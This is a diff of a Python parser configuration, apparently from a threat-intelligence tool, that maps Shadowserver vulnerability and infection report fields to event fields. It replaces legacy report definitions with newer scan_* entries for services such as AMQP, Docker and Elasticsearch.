-        ('extra.', 'validation_level', validate_to_none),
-        ('extra.', 'browser_error', validate_to_none),
+        ('extra.', 'machine_type', validate_to_none),
+        ('extra.', 'afp_versions', validate_to_none),
+        ('extra.', 'uams', validate_to_none),
+        ('extra.', 'flags', validate_to_none),
+        ('extra.', 'server_name', validate_to_none),
+        ('extra.', 'signature', validate_to_none),
+        ('extra.', 'directory_service', validate_to_none),
+        ('extra.', 'utf8_servername', validate_to_none),
+        ('extra.', 'network_address', validate_to_none),
     ],
     'constant_fields': {
+        'classification.identifier': 'accessible-afp',
         'classification.taxonomy': 'vulnerable',
         'classification.type': 'vulnerable-system',
-        'classification.identifier': 'ssl-freak',
-        'protocol.application': 'https',
+        'protocol.application': 'afp',
     },
 }
 
-# https://www.shadowserver.org/what-we-do/network-reporting/ssl-poodle-report/
-ssl_poodle46_vulnerable_servers = {
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-amqp-report/
+scan_amqp = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
+        ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'ssl-poodle' in constant_fields
-        ('extra.', 'handshake', validate_to_none),
+        ('extra.', 'tag', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('extra.', 'cipher_suite', validate_to_none),
-        ('extra.', 'ssl_poodle', convert_bool),
-        ('extra.', 'cert_length', validate_to_none),
-        ('extra.', 'subject_common_name', validate_to_none),
-        ('extra.', 'issuer_common_name', validate_to_none),
-        ('extra.', 'cert_issue_date', validate_to_none),
-        ('extra.', 'cert_expiration_date', validate_to_none),
-        ('extra.', 'sha1_fingerprint', validate_to_none),
-        ('extra.', 'cert_serial_number', validate_to_none),
-        ('extra.', 'ssl_version', validate_to_none),
-        ('extra.', 'signature_algorithm', validate_to_none),
-        ('extra.', 'key_algorithm', validate_to_none),
-        ('extra.', 'subject_organization_name', validate_to_none),
-        ('extra.', 'subject_organization_unit_name', validate_to_none),
-        ('extra.', 'subject_country', validate_to_none),
-        ('extra.', 'subject_state_or_province_name', validate_to_none),
-        ('extra.', 'subject_locality_name', validate_to_none),
-        ('extra.', 'subject_street_address', validate_to_none),
-        ('extra.', 'subject_postal_code', validate_to_none),
-        ('extra.', 'subject_surname', validate_to_none),
-        ('extra.', 'subject_given_name', validate_to_none),
-        ('extra.', 'subject_email_address', validate_to_none),
-        ('extra.', 'subject_business_category', validate_to_none),
-        ('extra.', 'subject_serial_number', validate_to_none),
-        ('extra.', 'issuer_organization_name', validate_to_none),
-        ('extra.', 'issuer_organization_unit_name', validate_to_none),
-        ('extra.', 'issuer_country', validate_to_none),
-        ('extra.', 'issuer_state_or_province_name', validate_to_none),
-        ('extra.', 'issuer_locality_name', validate_to_none),
-        ('extra.', 'issuer_street_address', validate_to_none),
-        ('extra.', 'issuer_postal_code', validate_to_none),
-        ('extra.', 'issuer_surname', validate_to_none),
-        ('extra.', 'issuer_given_name', validate_to_none),
-        ('extra.', 'issuer_email_address', validate_to_none),
-        ('extra.', 'issuer_business_category', validate_to_none),
-        ('extra.', 'issuer_serial_number', validate_to_none),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
+        ('extra.', 'channel', validate_to_none),
+        ('extra.', 'message_length', validate_to_none),
+        ('extra.', 'class', validate_to_none),
+        ('extra.', 'method', validate_to_none),
+        ('extra.', 'version_major', validate_to_none),
+        ('extra.', 'version_minor', validate_to_none),
+        ('extra.', 'capabilities', validate_to_none),
+        ('extra.', 'cluster_name', validate_to_none),
+        ('extra.', 'platform', validate_to_none),
+        ('extra.', 'product', validate_to_none),
+        ('extra.', 'product_version', validate_to_none),
+        ('extra.', 'mechanisms', validate_to_none),
+        ('extra.', 'locales', validate_to_none),
         ('extra.', 'sector', validate_to_none),
-        ('extra.', 'sha256_fingerprint', validate_to_none),
-        ('extra.', 'sha512_fingerprint', validate_to_none),
-        ('extra.', 'md5_fingerprint', validate_to_none),
-        ('extra.', 'http_response_type', validate_to_none),
-        ('extra.', 'http_code', convert_int),
-        ('extra.', 'http_reason', validate_to_none),
-        ('extra.', 'content_type', validate_to_none),
-        ('extra.', 'http_connection', validate_to_none),
-        ('extra.', 'www_authenticate', validate_to_none),
-        ('extra.', 'set_cookie', validate_to_none),
-        ('extra.', 'server_type', validate_to_none),
-        ('extra.', 'content_length', validate_to_none),
-        ('extra.', 'transfer_encoding', validate_to_none),
-        ('extra.', 'http_date', convert_date),
-        ('extra.', 'cert_valid', convert_bool),
-        ('extra.', 'self_signed', convert_bool),
-        ('extra.', 'cert_expired', convert_bool),
-        ('extra.', 'browser_trusted', convert_bool),
-        ('extra.', 'validation_level', validate_to_none),
-        ('extra.', 'browser_error', validate_to_none),
-        ('extra.', 'tlsv13_support', validate_to_none),
-        ('extra.', 'tlsv13_cipher', validate_to_none),
     ],
     'constant_fields': {
+        'classification.identifier': 'accessible-amqp',
         'classification.taxonomy': 'vulnerable',
         'classification.type': 'vulnerable-system',
-        'classification.identifier': 'ssl-poodle',
-        'protocol.application': 'https',
+        'protocol.application': 'amqp',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Open-Memcached
-open_memcached = {
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-apple-remote-desktop-ard-report/
+scan_ard = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
         ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'open-memcached' in constant_fields
-        ('extra.', 'version', validate_to_none),
+        ('extra.', 'tag', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'pid', convert_int),
-        ('extra.', 'pointer_size', convert_int),
-        ('extra.', 'uptime', convert_int),
-        ('extra.', 'time', validate_to_none),
-        ('extra.', 'curr_connections', convert_int),
-        ('extra.', 'total_connections', convert_int),
-        ('extra.', 'sector', validate_to_none),
+        ('extra.', 'machine_name', validate_to_none),
+        ('extra.', 'response_size', convert_int),
     ],
     'constant_fields': {
+        'classification.identifier': 'accessible-ard',
         'classification.taxonomy': 'vulnerable',
         'classification.type': 'vulnerable-system',
-        'classification.identifier': 'open-memcached',
-        'protocol.application': 'memcached',
     },
 }
 
-# https://www.shadowserver.org/what-we-do/network-reporting/drone-botnet-drone-report/
-# legacy (replaced by event4_sinkhole, event4_honeypot_darknet and event46_sinkhole_http)
-drone = {
+# https://www.shadowserver.org/what-we-do/network-reporting/open-chargen-report/
+scan_chargen = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
+        ('extra.response_size', 'size', convert_int),
+        ('protocol.transport', 'protocol'),
+        ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('source.reverse_dns', 'hostname'),
-        ('protocol.transport', 'type'),
-        ('malware.name', 'infection'),
-        ('destination.url', 'url', convert_http_host_and_url, True),
-        ('user_agent', 'agent'),
-        ('destination.ip', 'cc_ip', validate_ip),
-        ('destination.port', 'cc_port'),
-        ('destination.asn', 'cc_asn', invalidate_zero),
-        ('destination.geolocation.cc', 'cc_geo'),
-        ('destination.fqdn', 'cc_dns', validate_fqdn),
-        ('connection_count', 'count', convert_int),
-        ('extra.', 'proxy', convert_bool),
-        ('protocol.application', 'application'),
-        ('os.name', 'p0f_genre'),
-        ('os.version', 'p0f_detail'),
-        ('extra.', 'machine_name', validate_to_none),
-        ('extra.', 'id', validate_to_none),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
-        ('extra.destination.naics', 'cc_naics', invalidate_zero),
-        ('extra.destination.sic', 'cc_sic', invalidate_zero),
-        ('extra.destination.sector', 'cc_sector', validate_to_none),
         ('extra.', 'sector', validate_to_none),
-        ('extra.', 'ssl_cipher', validate_to_none),
-        ('extra.', 'family', validate_to_none),
-        ('extra.', 'tag', validate_to_none),
-        ('extra.', 'public_source', validate_to_none),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'malicious-code',
-        'classification.type': 'infected-system',
-        # classification.identifier will be set to (harmonized) malware name by modify expert
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+        'protocol.application': 'chargen',
+        'classification.identifier': 'open-chargen',
     },
 }
 
-drone_spam = {
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-cisco-smart-install-report/
+scan_cisco_smart_install = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
+        ('protocol.transport', 'protocol'),
+        ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('source.fqdn', 'hostname'),
-        ('protocol.transport', 'type'),
-        (False, 'infection'),  # is just 'spam'
-        ('source.url', 'url', convert_http_host_and_url, True),
-        ('user_agent', 'agent'),
-        ('destination.ip', 'cc_ip', validate_ip),
-        ('destination.port', 'cc_port'),
-        ('destination.asn', 'cc_asn', invalidate_zero),
-        ('destination.geolocation.cc', 'cc_geo'),
-        ('destination.fqdn', 'cc_dns', validate_fqdn),
-        ('connection_count', 'count', convert_int),
-        ('extra.', 'proxy', convert_bool),
-        ('protocol.application', 'application'),
-        ('os.name', 'p0f_genre'),
-        ('os.version', 'p0f_detail'),
-        ('extra.', 'machine_name', validate_to_none),
-        ('extra.', 'id', validate_to_none),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
-        ('extra.destination.naics', 'cc_naics', invalidate_zero),
-        ('extra.destination.sic', 'cc_sic', invalidate_zero),
-        ('extra.destination.sector', 'cc_sector', validate_to_none),
-        ('extra.', 'sector', validate_to_none),
-        ('extra.', 'ssl_cipher', validate_to_none),
-        ('extra.', 'family', validate_to_none),
-        ('extra.', 'tag', validate_to_none),
-        ('extra.', 'public_source', validate_to_none),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'abusive-content',
-        'classification.type': 'spam',
-        'classification.identifier': 'spam',
+        'classification.identifier': 'accessible-cisco-smart-install',
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+        'protocol.application': 'cisco-smart-install',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Open-XDMCP
-open_xdmcp = {
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-coap-report/
+scan_coap = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
         ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'open-xdmcp' in constant_fields
+        ('extra.', 'tag', validate_to_none),
+        ('extra.', 'version', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'opcode', validate_to_none),
-        ('extra.', 'reported_hostname', validate_to_none),
-        ('extra.', 'status', validate_to_none),
-        ('extra.', 'size', convert_int),
+        ('extra.', 'response', validate_to_none),
     ],
     'constant_fields': {
+        'classification.identifier': 'accessible-coap',
         'classification.taxonomy': 'vulnerable',
         'classification.type': 'vulnerable-system',
-        'classification.identifier': 'open-xdmcp',
-        'protocol.application': 'xdmcp',
+        'protocol.application': 'coap',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Compromised-Website
-compromised_website = {
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-couchdb-report/
+scan_couchdb = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
+        ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
-        ('malware.name', 'tag'),
-        ('protocol.application', 'application'),
+        ('extra.', 'tag', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('source.url', 'url', convert_http_host_and_url, True),
-        ('source.fqdn', 'http_host', validate_fqdn),
-        ('event_description.text', 'category'),
-        ('extra.', 'system', validate_to_none),
-        ('extra.', 'detected_since', validate_to_none),
-        ('extra.', 'server', validate_to_none),
-        ('extra.', 'redirect_target', validate_to_none),
-        ('extra.', 'naics', invalidate_zero),
-        ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'sector', validate_to_none),
+        ('extra.source.naics', 'naics', invalidate_zero),
+        ('extra.source.sic', 'sic', invalidate_zero),
+        ('extra.source.sector', 'sector', validate_to_none),
+        ('extra.', 'server_version', validate_to_none),
+        ('extra.', 'couchdb_message', validate_to_none),
+        ('extra.', 'couchdb_version', validate_to_none),
+        ('extra.', 'git_sha', validate_to_none),
+        ('extra.', 'features', validate_to_none),
+        ('extra.', 'vendor', validate_to_none),
+        ('extra.', 'visible_databases', validate_to_none),
+        ('extra.', 'error', validate_to_none),
+        ('extra.', 'error_reason', validate_to_none),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'intrusions',
-        'classification.type': 'system-compromise',
-        'classification.identifier': 'compromised-website',
+        'classification.taxonomy': 'other',
+        'classification.type': 'other',
+        'protocol.application': 'CouchDB',
+        'classification.identifier': 'open-couchdb',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Open-NATPMP
-open_natpmp = {
+# https://www.shadowserver.org/what-we-do/network-reporting/open-cwmp-report/
+scan_cwmp = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
         ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'open-natpmp' in constant_fields
-        ('extra.', 'version', validate_to_none),
+        ('extra.', 'tag', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'opcode', validate_to_none),
-        ('extra.', 'uptime', validate_to_none),
-        ('extra.', 'external_ip', validate_ip),
+        ('extra.', 'http', validate_to_none),
+        ('extra.', 'http_code', convert_int),
+        ('extra.', 'http_reason', validate_to_none),
+        ('extra.', 'content_type', validate_to_none),
+        ('extra.', 'connection', validate_to_none),
+        ('extra.', 'www_authenticate', validate_to_none),
+        ('extra.', 'set_cookie', validate_to_none),
+        ('extra.', 'server', validate_to_none),
+        ('extra.', 'content_length', convert_int),
+        ('extra.', 'transfer_encoding', validate_to_none),
+        ('extra.', 'date', validate_to_none),
         ('extra.', 'sector', validate_to_none),
     ],
     'constant_fields': {
         'classification.taxonomy': 'vulnerable',
         'classification.type': 'vulnerable-system',
-        'classification.identifier': 'open-natpmp',
-        'protocol.application': 'natpmp',
+        'protocol.application': 'cwmp',
+        'classification.identifier': 'open-cwmp',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Netis-Router
-open_netis = {
+# https://www.shadowserver.org/what-we-do/network-reporting/open-db2-discovery-service-report/
+scan_db2 = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
+        ('extra.', 'size', convert_int),
+        ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'open-netis' in constant_fields
-        ('extra.', 'response', validate_to_none),
+        ('extra.', 'tag', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'sector', validate_to_none),
+        ('extra.', 'db2_hostname', validate_to_none),
+        ('extra.', 'servername', validate_to_none),
     ],
     'constant_fields': {
+        'classification.identifier': 'open-db2-discovery-service',
         'classification.taxonomy': 'vulnerable',
         'classification.type': 'vulnerable-system',
-        'classification.identifier': 'open-netis',
-        'protocol.transport': 'udp',
+        'protocol.application': 'db2',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/NTP-Version
-ntp_version = {
+# https://www.shadowserver.org/what-we-do/network-reporting/vulnerable-ddos-middlebox-report/
+scan_ddos_middlebox = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
+        ('protocol.application', 'tag'),
         ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('extra.', 'version', validate_to_none),
-        ('extra.', 'clk_wander', convert_float),
-        ('extra.', 'clock', validate_to_none),
-        ('extra.', 'error', validate_to_none),
-        ('extra.', 'frequency', convert_float),
-        ('extra.', 'jitter', convert_float),
-        ('extra.', 'leap', convert_int),
-        ('extra.', 'mintc', validate_to_none),
-        ('extra.', 'noise', convert_float),
-        ('extra.', 'offset', convert_float),
-        ('extra.', 'peer', convert_int),
-        ('extra.', 'phase', convert_float),
-        ('extra.', 'poll', convert_int),
-        ('extra.', 'precision', convert_int),
-        ('extra.', 'processor', validate_to_none),
-        ('extra.', 'refid', validate_to_none),
-        ('extra.', 'reftime', validate_to_none),
-        ('extra.', 'rootdelay', convert_float),
-        ('extra.', 'rootdispersion', convert_float),
-        ('extra.', 'stability', convert_float),
-        ('extra.', 'state', convert_int),
-        ('extra.', 'stratum', convert_int),
-        ('extra.', 'system', validate_to_none),
-        ('extra.', 'tai', convert_int),
-        ('extra.', 'tc', convert_int),
-        ('extra.', 'naics', invalidate_zero),
-        ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'sector', validate_to_none),
+        ('extra.source.naics', 'naics', invalidate_zero),
+        ('extra.source.sic', 'sic', invalidate_zero),
+        ('extra.source.sector', 'sector', validate_to_none),
+        ('extra.', 'source_port', validate_to_none),
+        ('extra.', 'bytes', convert_int),
+        ('extra.', 'amplification', convert_float),
+        ('extra.', 'method', validate_to_none),
     ],
     'constant_fields': {
         'classification.taxonomy': 'vulnerable',
         'classification.type': 'vulnerable-system',
-        'classification.identifier': 'ntp-version',
-        'protocol.application': 'ntp',
-    },
-}
-
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Sandbox-URL
-sandbox_url = {
-    'required_fields': [
-        ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-    ],
-    'optional_fields': [
-        ('source.asn', 'asn', invalidate_zero),
-        ('source.geolocation.cc', 'geo'),
-        ('malware.hash.md5', 'md5hash'),
-        ('source.url', 'url'),
-        ('user_agent', 'user_agent', validate_to_none),
-        ('source.fqdn', 'host', validate_fqdn),
-        ('extra.', 'method', validate_to_none),
-    ],
-    'constant_fields': {
-        'classification.taxonomy': 'malicious-code',
-        'classification.type': 'malware-distribution',
-        'classification.identifier': 'sandbox-url',
+        'classification.identifier': 'open-ddos-middlebox',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Spam-URL
-spam_url = {
+# http://dnsscan.shadowserver.org
+scan_dns = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'src'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
-        ('source.url', 'url'),
-        ('source.reverse_dns', 'host'),
+        ('extra.', 'min_amplification', convert_float),
+        ('protocol.transport', 'protocol'),
+        ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
+        ('extra.', 'dns_version', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('extra.', 'subject', validate_to_none),
-        ('extra.', 'ip', validate_ip),
-        ('extra.', 'src_asn', convert_int),
-        ('extra.', 'src_geo', validate_to_none),
-        ('extra.', 'src_region', validate_to_none),
-        ('extra.', 'src_city', validate_to_none),
-        ('extra.', 'sender', validate_to_none),
+        ('os.name', 'p0f_genre'),
+        ('os.version', 'p0f_detail'),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
+        ('extra.', 'sector', validate_to_none),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'abusive-content',
-        'classification.type': 'spam',
-        'classification.identifier': 'spam-url',
+        'classification.identifier': 'dns-open-resolver',
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+        'protocol.application': 'dns',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Vulnerable-ISAKMP
-vulnerable_isakmp = {
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-docker-service-report/
+scan_docker = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
         ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'open-ike' in constant_fields
+        ('extra.', 'tag', validate_to_none),
+        ('extra.', 'version', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('extra.', 'naics', invalidate_zero),
-        ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'initiator_spi', validate_to_none),
-        ('extra.', 'responder_spi', validate_to_none),
-        ('extra.', 'next_payload', convert_int),
-        ('extra.', 'exchange_type', convert_int),
-        ('extra.', 'flags', convert_int),
-        ('extra.', 'message_id', validate_to_none),
-        ('extra.', 'next_payload2', convert_int),
-        ('extra.', 'domain_of_interpretation', convert_int),
-        ('extra.', 'protocol_id', convert_int),
-        ('extra.', 'spi_size', convert_int),
-        ('extra.', 'notify_message_type', convert_int),
+        ('extra.source.naics', 'naics', invalidate_zero),
+        ('extra.source.sic', 'sic', invalidate_zero),
+        ('extra.source.sector', 'sector', validate_to_none),
+        ('extra.', 'http', validate_to_none),
+        ('extra.', 'http_code', convert_int),
+        ('extra.', 'http_reason', validate_to_none),
+        ('extra.', 'content_type', validate_to_none),
+        ('extra.', 'server', validate_to_none),
+        ('extra.', 'date', validate_to_none),
+        ('extra.', 'experimental', validate_to_none),
+        ('extra.', 'api_version', validate_to_none),
+        ('extra.', 'arch', validate_to_none),
+        ('extra.', 'go_version', validate_to_none),
+        ('extra.', 'os', validate_to_none),
+        ('extra.', 'kernel_version', validate_to_none),
+        ('extra.', 'git_commit', validate_to_none),
+        ('extra.', 'min_api_version', validate_to_none),
+        ('extra.', 'build_time', validate_to_none),
+        ('extra.', 'pkg_version', validate_to_none),
     ],
     'constant_fields': {
         'classification.taxonomy': 'vulnerable',
         'classification.type': 'vulnerable-system',
-        'classification.identifier': 'open-ike',
-        'protocol.application': 'ipsec',
-    }
+        'protocol.application': 'docker',
+        'classification.identifier': 'open-docker',
+    },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Accessible-RDP
-accessible_rdp = {
+# https://www.shadowserver.org/what-we-do/network-reporting/open-dvr-dhcpdiscover-report/
+scan_dvr_dhcpdiscover = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
+        ('protocol.application', 'tag'),
+        ('extra.', 'video_input_channels', convert_int),
+        ('extra.', 'alarm_input_channels', convert_int),
+        ('extra.', 'video_output_channels', convert_int),
+        ('extra.', 'alarm_output_channels', convert_int),
+        ('extra.', 'remote_video_input_channels', convert_int),
+        ('extra.', 'ipv4_dhcp_enable', convert_bool),
+        ('extra.', 'ipv6_dhcp_enable', convert_bool),
+        ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'open-rdp' in constant_fields
-        ('extra.', 'handshake', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('extra.', 'rdp_protocol', validate_to_none),
-        ('extra.', 'cert_length', convert_int),
-        ('extra.', 'subject_common_name', validate_to_none),
-        ('extra.', 'issuer_common_name', validate_to_none),
-        ('extra.', 'cert_issue_date', validate_to_none),
-        ('extra.', 'cert_expiration_date', validate_to_none),
-        ('extra.', 'sha1_fingerprint', validate_to_none),
-        ('extra.', 'cert_serial_number', validate_to_none),
-        ('extra.', 'ssl_version', invalidate_zero),
-        ('extra.', 'signature_algorithm', validate_to_none),
-        ('extra.', 'key_algorithm', validate_to_none),
-        ('extra.', 'sha256_fingerprint', validate_to_none),
-        ('extra.', 'sha512_fingerprint', validate_to_none),
-        ('extra.', 'md5_fingerprint', validate_to_none),
-        ('extra.', 'naics', invalidate_zero),
-        ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'sector', validate_to_none),
-        ('extra.', 'tlsv13_support', validate_to_none),  # always empty so far
-        ('extra.', 'tlsv13_cipher', validate_to_none),  # always empty so far
-        ('extra.', 'cve20190708_vulnerable', convert_bool),
-        ('extra.', 'bluekeep_vulnerable', convert_bool),
+        ('extra.source.naics', 'naics', invalidate_zero),
+        ('extra.source.sic', 'sic', invalidate_zero),
+        ('extra.source.sector', 'sector', validate_to_none),
+        ('extra.', 'device_vendor', validate_to_none),
+        ('extra.', 'device_type', validate_to_none),
+        ('extra.', 'device_model', validate_to_none),
+        ('extra.', 'device_version', validate_to_none),
+        ('extra.', 'device_id', validate_to_none),
+        ('extra.', 'device_serial', validate_to_none),
+        ('extra.', 'machine_name', validate_to_none),
+        ('extra.', 'manufacturer', validate_to_none),
+        ('extra.', 'method', validate_to_none),
+        ('extra.', 'http_port', convert_int),
+        ('extra.', 'internal_port', convert_int),
+        ('extra.', 'mac_address', validate_to_none),
+        ('extra.', 'ipv4_address', validate_to_none),
+        ('extra.', 'ipv4_gateway', validate_to_none),
+        ('extra.', 'ipv4_subnet_mask', validate_to_none),
+        ('extra.', 'ipv6_address', validate_to_none),
+        ('extra.', 'ipv6_link_local', validate_to_none),
+        ('extra.', 'ipv6_gateway', validate_to_none),
     ],
     'constant_fields': {
         'classification.taxonomy': 'vulnerable',
         'classification.type': 'vulnerable-system',
-        'classification.identifier': 'open-rdp',
-        'protocol.transport': 'tcp',
-        'protocol.application': 'rdp',
+        'classification.identifier': 'open-dvr-dhcpdiscover',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Accessible-SMB
-accessible_smb = {
+# https://www.shadowserver.org/what-we-do/network-reporting/open-elasticsearch-report/
+scan_elasticsearch = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
+        ('extra.', 'ok', convert_bool),
+        ('extra.', 'status', convert_int),
+        ('extra.', 'build_snapshot', convert_bool),
+        ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
+        ('extra.', 'version', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'smb_implant', convert_bool),
